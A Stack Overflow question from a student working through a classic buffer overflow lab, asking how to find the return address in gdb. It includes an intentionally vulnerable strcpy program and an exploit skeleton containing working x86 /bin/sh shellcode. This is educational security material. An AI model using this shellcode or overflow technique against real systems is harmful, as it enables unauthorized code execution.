0

I am writing exploit.c for my buffer overflow program and am lost trying to get return address. The code return below is my strategy, where ret would be the return address.

How do I get this return address from the gdb? (Base code is at the end.)

My strategy was to set a break point at bof function in stack and run the code and use the saved eip there as the return address.

long* ptr = (long*)(buffer + 24);
 ret = 0x-------;
*ptr = ret;
 strcpy(buffer + 517 - strlen(shellcode), shellcode);

Shouldn't this piece of code do the job for me? Why do I need to fill any part of buffer array with other information?

Base code:

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[24];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

/* exploit.c  */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */ 

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
Improve this question
2
  • The get_sp function does nothing meaningful because the author did not understand inline asm. It copies the stack pointer to the eax register, but then does nothing with it, assuming (invalidly) that it will still be there when the function returns. The correct form would be unsigned ret; __asm__("mov %%esp,%0" : "=r"(ret)); return ret; Commented Oct 10, 2018 at 4:35
  • 1
    Possible duplicate of Buffer Overflow Vulnerability Lab problems Commented Apr 11, 2019 at 9:26
Related questions
8
Stack Overflow Exploit in C
1
C overflows need some direction
2
Problems exploiting a buffer overflow
Load 7 more related questions Show fewer related questions

0

Reset to default

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.